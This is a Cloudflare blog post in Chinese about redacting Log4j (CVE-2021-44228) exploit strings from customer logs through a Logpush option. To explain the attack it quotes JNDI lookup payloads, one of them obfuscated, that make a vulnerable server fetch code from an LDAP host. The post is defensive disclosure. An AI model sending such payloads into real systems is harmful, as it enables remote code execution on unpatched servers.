訂閱以接收新文章的通知:

處理 Cloudflare 記錄以保護客戶免受 Log4j 攻擊

2021-12-14

閱讀時間:1 分鐘
本貼文還提供以下語言版本:EnglishFrançaisDeutsch日本語한국어简体中文

2021 年 12 月 9 日,全世界得知 CVE-2021-44228 這種零時差漏洞利用正在影響 Apache Log4j 公用程式。Cloudflare 立即更新了我們的 WAF 以協助防範這個漏洞,但是仍然建議客戶盡快更新其系統。

然而,我們知道許多 Cloudflare 客戶會透過運用 Log4j 的軟體來使用其記錄,因此我們也會透過 Cloudflare 記錄來緩解任何嘗試的漏洞利用。在撰寫此文的同時,我們已在傳送給客戶的記錄中看到漏洞利用模式,每秒高達 1000 次。

現在必須做的是,客戶可以更新其 Logpush 工作,以自動編輯可能會觸發此漏洞的權杖。您可以到我們的開發人員文件中閱讀更多相關資訊,或是參閱下列詳細資料。

攻擊的運作原理

您可以到我們的部落格文章閱讀更多有關 Log4j 漏洞運作原理的資訊。簡而言之,攻擊者可以在任何字串中加上 ${jndi:ldap://example.com/a} 等內容。然後 Log4j 就會在網際網路上進行連線以擷取此目標。

Cloudflare 記錄含有多個字串欄位是由公用網際網路的終端使用者所控制,例如使用者代理程式和 URL 路徑。在任何讀取這些欄位且使用未修補之 Log4j 執行個體的系統上,惡意使用者就可能可以運用這個漏洞造成遠端程式碼執行。

我們的緩解方案

遺憾的是,光是檢查 ${jndi:ldap 這類的權杖並不足以防範此漏洞。因為範本化語言具有表達力,所以也必須檢查是否有模糊的變體。目前我們已經在 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} 這類的外部使用變體中看到攻擊者的蹤跡。因此,編輯 ${ 權杖是防範此漏洞最普遍的方式。

在我們目前傳送給客戶的記錄中,${ 權杖每秒出現高達 1,000 次。快速檢查部分記錄後顯示,其中有許多_並非_嘗試利用此漏洞。因此,對於可能希望在其記錄中看到此權杖的客戶,我們沒有充足的把握能在不影響他們的情況下編輯記錄。

從現在開始,客戶可以更新其 Logpush 工作以編輯在所有地方出現的 ${ 字串,並將其替換為 x{。

為此,客戶可以更新其 Logpush 工作選項設定,以便納入參數 CVE-2021-44228=true。如需有關如何使用 Logpush API 完成此動作的詳細說明,請參閱我們開發人員文件中的範例。請注意,此選項目前不適用於 Cloudflare 儀錶板,而且僅能透過 API 來修改。

在 Twitter 上討論 在 Hacker News 上討論 在 Reddit 上討論

記錄 漏洞 零時差威脅 網路安全 Log4J

在 Twitter 上關注

Jon Levine |@jplevine

Cloudflare |Cloudflare

我們保護整個企業網路,協助客戶有效地建置網際網路規模的應用程式,加速任何網站或網際網路應用程式抵禦 DDoS 攻擊,阻止駭客入侵,並且可以協助您實現 Zero Trust

從任何裝置造訪 1.1.1.1,即可開始使用我們的免費應用程式,讓您的網際網路更快速、更安全。

若要進一步瞭解我們協助打造更好的網際網路的使命,請從這裡開始。如果您正在尋找新的職業方向,請查看我們的職缺
LogsVulnerabilitiesZero Day Threats安全性Log4JLog4Shell

在 X 上進行關注

Jon Levine|@jplevine
Cloudflare|@cloudflare

相關貼文

2024年11月26日 下午4:00

Cloudflare incident on November 14, 2024, resulting in lost logs

On November 14, 2024, Cloudflare experienced a Cloudflare Logs outage, impacting the majority of customers using these products. During the ~3.5 hours that these services were impacted, about 55% of the logs we normally send to customers were not sent and were lost. The details of what went wrong and why are interesting both for customers and practitioners....

2024年10月08日 下午1:00

Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One

The acquisition and integration of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services. ...